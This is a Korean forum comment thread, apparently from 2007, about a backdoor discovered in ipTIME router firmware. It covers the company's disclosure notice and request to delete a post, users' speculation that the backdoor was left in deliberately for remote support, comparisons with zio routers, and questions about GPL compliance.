그렇다고 K모 사이트를 그 회사에서 운영하는 것도 아니죠?
그런데 왜 저런 말이 한 회사의 공식 입장표명에 나와야 하는 것인지 저는 모르겠습니다.
논리적으로 전혀 근거가 없는 주장이에요.
그런 논리라면 이 곳에서 활동하시는 분들은 모 대기업의 직원, 또는 추종자들인가요?
매우 신기한 논리를 펼치시는군요.
집에서 쓰는 유선공유기가 iptime 제품인데 유무선 공유기로 바꿀려는 생각이 있었는데요.
위 입장표명 글을 보니, 1~2만원 더 주는 한이 있어도,
주저말고 cisco-linksys 제품으로 바꿔야겠다는 생각이 듭니다.
points
ipTIME 홈페이지 공지사항 수정
sj316님
당사 홈페이지 2007년 6월 22일자 공지사항에 보안관련 내용을 추가하여
백도어 존재 사실을 공지 하였습니다. 확인하시기 바랍니다.
향후 연락이 필요하시 다면 ysyoo@efm-net.com으로 연락주시면 됩니다.
빠른 삭제 부탁드립니다.
points
ipTIME
ipTIME 초기모델을(2000년 또는 2001년 여름) 하이텔 하드웨어 동호회에서 공동구매를 하고 여지껏 다른 회사제품으로 바꿀생각 없을정도로 잘 사용하고 있습니다. 이번 보안버그도 빠른 대처에 '역시 ipTIME' 이다 라는걸 느끼게 해줬네요. 공지사항도 확인해보니 버그(백도어)가 있다고 인정을 한점도 역시 높이살만한것 같습니다.
다만 아쉬운건 위에 권순선님께서 말씀하신 GPL 에 대해서는 어떻게 조치를 취해주실지 궁금합니다. 기대하겠습니다.
http://kkanari.egloos.com/
정말 개발상 실수였는지는 의문이네요!!
iptime 공유기 초기에도 백포트? 가 있었습니다.
지금과는 달리 특정 포트로 접근하면 암호 없이 접근이 가능했죠. 접근이 더 쉬웠습니다.
이 역시 문제가 되니 수정했는데, 펌웨어 수정본에 아무런 말도 없었고 그래서 백도어를 없앴는지 알았더니, 저런 식으로 여지껏 접근했나 보군요.
정말 개발상 실수라면 원격AS시에 iptime측이 사용자 암호를 물어봐야 하는데, iptime측이 물어 본 걸 본적이 없습니다. 즉, AS하는 인력에게는 접근법을 알려준 것이겠죠??
백도어를 AS시에 쓰려고 일부러 만든 것이라 추측합니다만...
자신의 공유기에 아무나 접근 가능하다면, 포트개방을 하지 않았더라도 악의의 사용자가 충분히 웹설정에서 간단히 포트조작만으로도 가능한 것을.
여지껏 절대 내부PC로는 사용자가 포트개방을 하지 않으면 접근 못한다고 iptime측이 게시판 답변 달았으니 정말 황당하군요..
또, 이번엔 어떤식으로 백도어를 만들어 둘까요?? 양심에도 문제가 있어 보입니다.
* iptime에서 펌웨어를 개발해 주는 것으로 아는 zio 공유기에서는 위와 같은 문제가 없는데, 기능을 뺐는지는 모르겠군요.
다만 iptime 측이 주장하는 "네트워크 감시" 기능의 오류로 만들어진 것은 아닌 것 같습니다.
동일한 기능이 zio에도 있는데 zio에는 위와 동일한 주소로는 안들어가니까요.. 만약 개발상 암호를 묻는게 불편해서 위와 같이 백도어가 생겼다면 zio에도 있어야 하지 않나요? Debug모드도 안들어가네요..
( 실제 zio공유기 홈페이지가도 iptime의 timeserver문제가 동일하게 올라와 있습니다. 심지어 도움말에 틀린 맞춤법까지 똑같습니다. )
이번엔 이 사건이 그냥 묻히지 않고, iptime측이 새로운 펌웨어에 또 다른 백도어를 만들지 않았나 확인이 필요 할 것 같네요.. 사용자가 많아지고 실력있는 분들도 계시니 이런 문제도 밝혀지는군요..
다른 공유기 회사들은 백도어가 없을까요?
김정균님이 올린신
김정균님이 올린신 글이 iptime 게시판에서 검색이 안되네요.
김정균님 이름, GPL, Lisence 등으로 검색으로 해도 안나오네요.
이 문제가 커지는 것을 우려하나 봅니다.
points
자동 업글은 아직도
자동 업글은 아직도 2.50 이 최신이라면서 업글이 안되는군요. 좀무..